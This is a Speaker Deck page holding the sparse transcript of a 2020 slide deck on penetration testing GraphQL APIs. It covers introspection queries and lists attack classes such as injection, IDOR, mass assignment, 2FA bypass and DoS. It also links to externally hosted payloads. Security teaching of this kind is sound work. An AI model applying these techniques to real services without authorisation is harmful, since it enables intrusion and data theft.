Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Pentesting GraphQL APIs
Search
Arun
July 17, 2020
Technology
0
190
Pentesting GraphQL APIs
Arun
July 17, 2020
Tweet
Share
More Decks by Arun
See All by Arun
Offensive-GraphQL-API-Exploitation
hehacks
1
290
OWASP DevSlop
hehacks
0
19
Android Pentesting For Beginners - RE & Static Code Analysis
hehacks
0
91
iOS Pentesting for Beginners
hehacks
1
25
Metasploit Database Usage
hehacks
0
19
Other Decks in Technology
See All in Technology
AndroidXR 開発ツールごとの できることできないこと
donabe3
0
130
Oracle Base Database Service 技術詳細
oracle4engineer
PRO
6
57k
Platform Engineeringは自由のめまい
nwiizo
4
2.1k
2.5Dモデルのすべて
yu4u
2
870
分解して理解する Aspire
nenonaninu
1
180
AndroidデバイスにFTPサーバを建立する
e10dokup
0
250
2/18/25: Java meets AI: Build LLM-Powered Apps with LangChain4j
edeandrea
PRO
0
120
明日からできる!技術的負債の返済を加速するための実践ガイド~『ホットペッパービューティー』の事例をもとに~
recruitengineers
PRO
3
400
Cloud Spanner 導入で実現した快適な開発と運用について
colopl
1
680
OpenID BizDay#17 KYC WG活動報告(法人) / 20250219-BizDay17-KYC-legalidentity
oidfj
0
250
技術的負債解消の取り組みと専門チームのお話 #技術的負債_Findy
bengo4com
1
1.3k
アジャイル開発とスクラム
araihara
0
170
Featured
See All Featured
Fontdeck: Realign not Redesign
paulrobertlloyd
83
5.4k
Building Flexible Design Systems
yeseniaperezcruz
328
38k
Being A Developer After 40
akosma
89
590k
[RailsConf 2023] Rails as a piece of cake
palkan
53
5.2k
The Cost Of JavaScript in 2023
addyosmani
47
7.3k
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
panda_program
100
18k
GraphQLの誤解/rethinking-graphql
sonatard
68
10k
No one is an island. Learnings from fostering a developers community.
thoeni
21
3.1k
Adopting Sorbet at Scale
ufuk
74
9.2k
Typedesign – Prime Four
hannesfritz
40
2.5k
The Cult of Friendly URLs
andyhume
78
6.2k
ReactJS: Keep Simple. Everything can be a component!
pedronauck
666
120k
Transcript
None
None
graphql { GraphQL GraphQL Architecture REST Vs GraphQL GraphQL Schema
Introspection Query GraphQL Vulnerabilities Pentesting Tools GraphQL in Action !!! }
None
None
None
None
None
Ref: https://bit.ly/3hLZNO7
Ref: https://bit.ly/3fBQSNk
None
None
• Query – For Retrieving data/Results, similar to GET in
REST. • Mutation – For Modifications Like POST/PUT/DELETE Operations. • Subscriptions – For Events/Realtime Updates. GraphQL Schema Subscriptions (Type) - EVENTS Mutations (Type) - WRITE Query (Type) - READ
None
None
Change the POST request into GET Request. Append the payload
on the Endpoint URL from below link https://pastebin.com/QyNaXVKg https://pastebin.com/dFdsTaDQ
None
SQL Injection NoSQL Injection Access Control Related Issues. Mass Assignment
IDOR Bypassing 2FA/BruteForce Attacks. DOS Attacks etc.,
None
None
None
None
None
None
None
None
None
hehacks
donabe3
oracle4engineer
nwiizo
yu4u
nenonaninu
e10dokup
edeandrea
recruitengineers
colopl
oidfj
bengo4com
araihara
paulrobertlloyd
yeseniaperezcruz
akosma
palkan
addyosmani
panda_program
sonatard
thoeni
ufuk
hannesfritz
andyhume
pedronauck
